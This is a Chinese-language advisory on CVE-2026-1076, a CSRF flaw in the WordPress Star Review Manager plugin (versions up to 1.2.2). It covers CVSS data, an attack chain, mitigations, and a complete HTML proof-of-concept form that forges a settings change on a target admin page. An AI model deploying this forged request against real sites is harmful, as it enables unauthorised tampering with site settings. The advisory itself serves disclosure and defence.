CVE-2026-1076 WordPress Star Review Manager插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2026-1076

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Star Review Manager plugin for WordPress

漏洞概述

CVE-2026-1076是WordPress的Star Review Manager插件中的一个跨站请求伪造（CSRF）漏洞。该漏洞存在于插件的所有版本中，最高版本至1.2.2。漏洞的根本原因在于插件的设置页面缺少适当的nonce验证机制，这使得攻击者能够诱导已登录的网站管理员执行未经授权的操作。具体来说，攻击者可以伪造请求来更新插件的CSS设置，由于缺乏CSRF保护，恶意请求会被服务器接受并执行。攻击成功的关键在于欺骗管理员点击特制的链接或访问包含恶意请求的页面。此漏洞的CVSS评分为4.3，属于中等严重程度，主要影响网站的配置完整性和设置的可靠性。

技术细节

Star Review Manager插件的settings.php文件（第3行起）处理管理员的设置请求时，未正确实现WordPress的nonce验证机制。WordPress推荐使用wp_verify_nonce()或check_admin_referer()函数来验证请求的合法性，但该插件直接处理POST/GET请求而忽略了这一关键步骤。攻击者可以构造一个包含恶意CSS设置的表单，并诱导已登录的管理员提交。由于浏览器会自动携带目标网站的Cookie，服务器无法区分这是管理员的合法操作还是攻击者伪造的请求。攻击者可以修改插件的CSS样式设置，可能用于实施钓鱼攻击或破坏网站外观。该漏洞属于OWASP Top 10中的A1类别（失效的访问控制），CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Star Review Manager插件版本，确认版本在1.2.2或以下

STEP 2

步骤2: 构造恶意请求

攻击者分析插件的设置页面功能，构造包含恶意CSS值的表单请求，绕过nonce验证

STEP 3

步骤3: 社会工程学攻击

攻击者通过钓鱼邮件、恶意链接或植入恶意代码的网页，诱导已登录的管理员访问或点击触发请求

STEP 4

步骤4: 请求执行

管理员浏览器自动携带Cookie向目标网站发送POST请求，服务器因缺少nonce验证而接受请求

STEP 5

步骤5: CSS设置篡改

插件更新CSS设置，攻击者注入的恶意CSS可能被用于钓鱼攻击或破坏网站视觉效果

STEP 6

步骤6: 持久化控制

修改后的CSS设置保存在数据库中，除非管理员手动修改或升级插件，否则恶意设置将持续生效

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2026-1076 -->
<!-- This PoC demonstrates how an attacker can forge a request to update -->
<!-- Star Review Manager CSS settings without proper nonce validation -->

<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - Star Review Manager</title>
</head>
<body>
    <h1>CSRF PoC for CVE-2026-1076</h1>
    <p>Click the button below to trigger the forged request:</p>
    
    <form action="http://target-wordpress-site.com/wp-admin/admin.php?page=star-review-manager-settings" method="POST" id="csrfForm">
        <!-- Required form fields for settings update -->
        <input type="hidden" name="srm_css_custom" value="/* Malicious CSS injected via CSRF */">
        <input type="hidden" name="srm_settings_nonce" value="">
        <input type="hidden" name="srm_save_settings" value="1">
        <!-- Additional hidden fields to complete the request -->
        <input type="hidden" name="srm_star_color" value="red">
        <input type="hidden" name="srm_background_color" value="black">
    </form>
    
    <button type="submit" onclick="this.disabled=true;this.innerText='Submitting...';document.getElementById('csrfForm').submit();">
        Click Here
    </button>
    
    <script>
        // Auto-submit on page load (for demonstration)
        // document.getElementById('csrfForm').submit();
    </script>
</body>
</html>

<!-- Attack Scenario: -->
<!-- 1. Attacker creates a malicious page with the above form -->
<!-- 2. Attacker tricks a logged-in admin to visit the page -->
<!-- 3. Admin clicks the button (or form auto-submits) -->
<!-- 4. Browser sends the request with admin's cookies -->
<!-- 5. Server processes the request without CSRF validation -->
<!-- 6. Plugin CSS settings are updated with attacker's values -->

影响范围

Star Review Manager plugin for WordPress <= 1.2.2

防御指南

临时缓解措施

在官方修复版本发布之前，网站管理员应提高警惕，避免点击来自不可信来源的链接；定期检查插件的设置页面是否有异常修改；考虑暂时禁用或删除Star Review Manager插件；使用WAF（Web应用防火墙）监控异常的设置修改请求；限制管理员账户的使用，避免从公共网络访问后台管理界面。